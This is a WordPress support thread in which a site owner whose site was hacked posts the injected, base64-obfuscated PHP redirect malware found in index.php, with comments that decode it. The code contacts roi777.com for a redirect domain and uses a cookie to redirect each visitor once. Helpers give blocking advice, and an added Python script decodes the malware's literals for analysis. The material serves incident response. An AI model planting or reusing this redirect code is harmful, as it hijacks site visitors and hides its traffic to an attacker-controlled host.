• Resolved kirai

    (@kirai)


    It seems there is some code inserted somewhere… it randomly redirects users to an external website, but it does it only one time per session.

    It redirects to an external website, but https://www.a works. Clicking on the top menu links also redirects to an external website.

    The page I need help with: [log in to see the link]

Viewing 9 replies - 16 through 24 (of 24 total)
  • I assume the code's target has changed.

    Did you check if the prior code is still the same code as before?
    The delay tells me it was trying but was hitting the wall you put up by blocking the sites and IPs.

    If the code has not changed and it got replaced, something is still reaching out.
    FTP or RDP maybe after a set time.

    Check the code and see if it changed.

    I learn every time I dig.
    roi 777.com seems to kick to kuhjgtfreda(dot)tk

    block ht tp:/ /front steps(dot)tk
    I would install ip2location or similar and block the .tk country.

    You can try adding this in .htaccess where you had the IP strings.

    Order Deny,Allow
    Deny from .tk

    You may just have to buy wordfence premium, use the country blocking and then maybe hire them to clean the site.

    I am learning as I go with this and a few other places have had the same issue as you.

    From other reports on this issue, it spawns a web page call that opens to the infected site.

    I have no idea if the server the application is running on has a web browser installed, but if it does (and that is beyond my knowledge), all that would need to be done is a single install with the browser homepage set to the virus site, and it opening and closing the browser on a built-in trigger/time/cookie.

    Again, block .tk and clear the code. See what happens.

    Thread Starter kirai

    (@kirai)

    I even changed the permissions of the index file to 444, and it changes to 644 and the code is inserted.

    Thread Starter kirai

    (@kirai)

    This is the new code. How do I know the target when new code is inserted?

    $id6fe1d0be634 = "/index/?2601510941471";
    $z8c7dd922ad47 = md5($id6fe1d0be634);              // cache file: md5 of the path, written in the current directory
    $u77e8e1445762 = time();
    $geaa082fa5781 = filemtime($z8c7dd922ad47);
    $u07cc694b9b3f = $u77e8e1445762 - $geaa082fa5781;  // age of the cache file in seconds
    if (file_exists($z8c7dd922ad47)) {
        $fe1260894f59e = @fopen($z8c7dd922ad47, base64_decode('cg=='));   // 'r'
        $xe4e46deb7f9c = json_decode(base64_decode(fread($fe1260894f59e, filesize($z8c7dd922ad47))), 1);
        fclose($fe1260894f59e);
    }
    if ($u07cc694b9b3f >= 60 || !file_exists($z8c7dd922ad47)) {
        // cache missing or older than 60 seconds: fetch a fresh redirect domain
        $v9b207167e538 = getDDroi($z8c7dd922ad47);
        if ($v9b207167e538[base64_decode('ZG9tYWlu')]) {                   // 'domain'
            $je617ef6974fa = base64_decode('aHR0cDovLw==') . $v9b207167e538[base64_decode('ZG9tYWlu')] . $id6fe1d0be634;   // 'http://' . domain . path
        } else {
            // fallback: ask the 'rsrv' URL stored in the cached JSON for a domain
            $wd88fc6edf21e = curl_init();
            curl_setopt($wd88fc6edf21e, CURLOPT_RETURNTRANSFER, true);
            curl_setopt($wd88fc6edf21e, CURLOPT_USERAGENT, base64_decode('QUkgcnNydg=='));   // 'AI rsrv'
            curl_setopt($wd88fc6edf21e, CURLOPT_URL, $xe4e46deb7f9c[base64_decode('cnNydg==')]);   // 'rsrv'
            curl_setopt($wd88fc6edf21e, CURLOPT_TIMEOUT, 10);
            $sad5f82e879a9 = curl_exec($wd88fc6edf21e);
            curl_close($wd88fc6edf21e);
            $je617ef6974fa = base64_decode('aHR0cDovLw==') . $sad5f82e879a9 . $id6fe1d0be634;
        }
    } else {
        $je617ef6974fa = base64_decode('aHR0cDovLw==') . $xe4e46deb7f9c[base64_decode('ZG9tYWlu')] . $id6fe1d0be634;
    }
    function getDDroi($z8c7dd922ad47) {
        // fetch the current redirect domain as JSON and cache it (base64-encoded) in the file
        $wd88fc6edf21e = curl_init();
        curl_setopt($wd88fc6edf21e, CURLOPT_RETURNTRANSFER, true);
        curl_setopt($wd88fc6edf21e, CURLOPT_USERAGENT, base64_decode('QUkgcm9p'));   // 'AI roi'
        curl_setopt($wd88fc6edf21e, CURLOPT_URL, base64_decode('aHR0cDovL3JvaTc3Ny5jb20vZG9tYWluX3RlbXAucGhwP2Y9anNvbg=='));   // 'http://roi777.com/domain_temp.php?f=json'
        curl_setopt($wd88fc6edf21e, CURLOPT_TIMEOUT, 10);
        $sb4a88417b3d0 = curl_exec($wd88fc6edf21e);
        curl_close($wd88fc6edf21e);
        $xe4e46deb7f9c = json_decode($sb4a88417b3d0, true);
        if ($xe4e46deb7f9c[base64_decode('ZG9tYWlu')]) {
            $y0666f0acdeed = @fopen($z8c7dd922ad47, base64_decode('dys='));   // 'w+'
            @fwrite($y0666f0acdeed, base64_encode($sb4a88417b3d0));
            @fclose($y0666f0acdeed);
            return $xe4e46deb7f9c;
        } else return false;
    }
    if (!$_COOKIE[base64_decode('YTc3N2Q=')]) {   // cookie 'a777d', valid 12 h: this is why each visitor is redirected only once
        setcookie(base64_decode('YTc3N2Q='), 1, time() + 43200, base64_decode('Lw=='));   // path '/'
        echo base64_decode('PHNjcmlwdD53aW5kb3cubG9jYXRpb24ucmVwbGFjZSgi') . $je617ef6974fa     // '<script>window.location.replace("'
           . base64_decode('Iik7d2luZG93LmxvY2F0aW9uLmhyZWYgPSAi') . $je617ef6974fa             // '");window.location.href = "'
           . base64_decode('Ijs8L3NjcmlwdD4=');                                                 // '";</script>'
    }
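One way to answer the question above (which target a newly inserted copy contacts) is to decode every base64_decode('...') literal in the suspect file instead of reading the obfuscated code by hand. This is an added example, not code from the thread or from WordPress; the PHP sample inside it is a constructed, abridged excerpt modelled on the snippet posted above.

```python
import base64
import re
from urllib.parse import urlparse

# Constructed excerpt modelled on the injected PHP quoted in the thread
# (abridged; variable names and literals follow the posted snippet).
SAMPLE_PHP = r"""<?php
$id6fe1d0be634 = "/index/?2601510941471";
$z8c7dd922ad47=md5($id6fe1d0be634);
$fe1260894f59e=@fopen($z8c7dd922ad47,base64_decode('cg=='));
curl_setopt($w,CURLOPT_USERAGENT,base64_decode('QUkgcm9p'));
curl_setopt($w,CURLOPT_URL,base64_decode('aHR0cDovL3JvaTc3Ny5jb20vZG9tYWluX3RlbXAucGhwP2Y9anNvbg=='));
$je617ef6974fa=base64_decode('aHR0cDovLw==').$x[base64_decode('ZG9tYWlu')].$id6fe1d0be634;
if(!$_COOKIE[base64_decode('YTc3N2Q=')]){setcookie(base64_decode('YTc3N2Q='),1,time()+43200,base64_decode('Lw=='));}
"""

# Matches base64_decode('...') with a single-quoted literal, the form used by the injection.
B64_CALL = re.compile(r"base64_decode\(\s*'([A-Za-z0-9+/=]+)'\s*\)")


def _decode(enc):
    """Decode one literal; malformed or binary payloads are flagged rather than crashing the scan."""
    try:
        return base64.b64decode(enc, validate=True).decode("utf-8")
    except (ValueError, UnicodeDecodeError):
        return "<non-text payload>"


def decode_literals(php_source):
    """Return (encoded, decoded) pairs for every base64_decode('...') literal, in source order."""
    return [(enc, _decode(enc)) for enc in B64_CALL.findall(php_source)]


def deobfuscate(php_source):
    """Rewrite the source with each base64_decode('...') call replaced by its plain PHP literal."""
    def plain(m):
        return "'" + _decode(m.group(1)).replace("\\", "\\\\").replace("'", "\\'") + "'"
    return B64_CALL.sub(plain, php_source)


def contacted_hosts(php_source):
    """Hosts of every URL hidden in the literals: what to block and what to grep other files for."""
    hosts = []
    for _, dec in decode_literals(php_source):
        host = urlparse(dec).hostname if dec.startswith(("http://", "https://")) else None
        if host and host not in hosts:
            hosts.append(host)
    return hosts


if __name__ == "__main__":
    for enc, dec in decode_literals(SAMPLE_PHP):
        print(f"{enc:<44} -> {dec!r}")
    print("hosts contacted:", contacted_hosts(SAMPLE_PHP))
```

Run it against the real injected file instead of SAMPLE_PHP; the deobfuscated output also shows the cookie name and the cache file the code writes, both worth searching for when cleaning up.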
    Thread Starter kirai

    (@kirai)

    Thank you as always, afleetingglimpse!

    I’ve blocked all .tk and I’m going to look into wordfence premium.

    Tried the prevention vs PHP injection I posted and it locked my site.

    Undid it, and I am back in, so that code failed and caused an error 500?

    The bad guys may have uploaded a hidden shell file somewhere that allows them to have access and alter your site. They have uploaded a script that, when accessed, alters your index.php file.

    It could be buried anywhere.

    Do you only have one instance of WordPress?

    Best not to have multiple instances on the same account.

    Here is a simple hacked site tutorial that I did.
    https://www.computer-geek.net/how-to-fix-your-hacked-wo-va-65.html

    Thread Starter kirai

    (@kirai)

    Thank you all, I moved to a new server, problem solved. But it seems blocking all .tk solved the problem also.

  • The topic ‘Got hacked’ is closed to new replies.